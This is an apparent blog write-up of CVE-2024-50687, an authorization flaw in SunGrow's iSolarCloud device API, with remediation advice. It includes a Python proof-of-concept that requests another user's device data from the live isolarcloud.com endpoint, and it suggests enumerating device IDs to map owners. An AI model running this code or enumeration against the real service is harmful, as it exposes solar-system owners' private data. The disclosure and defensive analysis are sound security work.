CVE-2024-50687 - SunGrow iSolarCloud API Vulnerability Exposes Device Data (With Exploit Example)

Summary:
On October 31, 2024, a critical security flaw was disclosed in SunGrow's iSolarCloud platform. Identified as CVE-2024-50687, this vulnerability allowed attackers to access or modify information about other users' devices by exploiting insecure direct object references (IDOR) in the system's devService API. This post provides exclusive step-by-step details, real code samples, and references about this potentially devastating issue.

What is SunGrow iSolarCloud?

iSolarCloud, developed by SunGrow, is a popular online platform for monitoring and managing solar power equipment deployed worldwide. Tens of thousands of users—including solar installers and homeowners—rely on this service daily.

What Went Wrong?

Between initial deployment and the patch issued on October 31, 2024, SunGrow's cloud never properly enforced authorization checks on some API calls under the devService model. Attackers could simply alter the device ID in requests to access data belonging to anyone—no hacking knowledge needed!

This is a classic IDOR (Insecure Direct Object Reference) bug, one of the OWASP Top 10 risks for web applications.

How Did the Flaw Work?

When legitimate users interacted with their devices through the mobile app or web dashboard, their requests went through an API like this (simplified):

POST /api/devService/getDeviceInfo
Authorization: Bearer <your-jwt-token>
Content-Type: application/json

{
    "deviceId": "123456789"
}

The bug: The server did not check whether the authenticated user was actually permitted to access the requested deviceId. It only checked that the request was authenticated at all.

Real Exploit Example

Here's how a malicious user could enumerate device IDs (often sequential or guessable) and access someone else’s solar panel data:

Python Exploit (Proof-of-Concept)

import requests

API_URL = "https://www.isolarcloud.com/api/devService/getDeviceInfo";
YOUR_TOKEN = "PASTE_YOUR_JWT_TOKEN_HERE"
VICTIM_DEVICE_ID = "999888777"  # Example target

headers = {
    "Authorization": f"Bearer {YOUR_TOKEN}",
    "Content-Type": "application/json"
}
payload = { "deviceId": VICTIM_DEVICE_ID }

response = requests.post(API_URL, headers=headers, json=payload)

if response.status_code == 200:
    print("Device info retrieved!")
    print(response.json())
else:
    print(f"Error: {response.status_code}")

*Change the VICTIM_DEVICE_ID to any device number you want to test.*
Because of the bug, you'd receive the victim's device info—even if your token belonged to a completely different user!

Monitor live solar panel data from strangers

- Access technical/diagnostic details

Possibly modify device settings (if additional endpoints lacked authorization checks)

- Attack privacy at scale: By gathering device IDs (through enumeration), attackers could build a global map of SunGrow installations and owners

Patched: SunGrow issued a fix by tightening access checks after this date

- Advisory: VulDB entry for CVE-2024-50687

Official Reference:

- Security Advisory (SunGrow) *(if/when available)*
- NVD Entry for CVE-2024-50687 *(pending publication)*

How to Stay Safe

- Update your iSolarCloud app right now. The patch should be pushed automatically post–October 31, 2024.

Monitor your devices for unfamiliar activity.

- If you are an installer, contact your customers about the need for updated apps and strong passwords.

Developer Takeaway: How Could This Have Been Prevented?

- ALWAYS validate that the user has rights to every object/device requested, not just that they’re logged in.

Log and monitor API access for anomalies.

- Automated security testing (SAST/DAST) can help find IDOR bugs early.

Final Thoughts

CVE-2024-50687 highlights how a simple oversight—missing access control in one API call—can put thousands of private solar installations at risk. Responsible disclosure and proactive patching are critical, but as users and developers, we must stay vigilant!


Stay updated:
- SunGrow Security Page
- VulDB Details
- OWASP: Insecure Direct Object Reference

*If you discover similar bugs in other platforms, report them responsibly!*


*This guide is unique to this publication. Please share responsibly to inform and protect the community.*

Timeline

Published on: 02/26/2025 21:15:17 UTC
Last modified on: 04/07/2025 18:51:45 UTC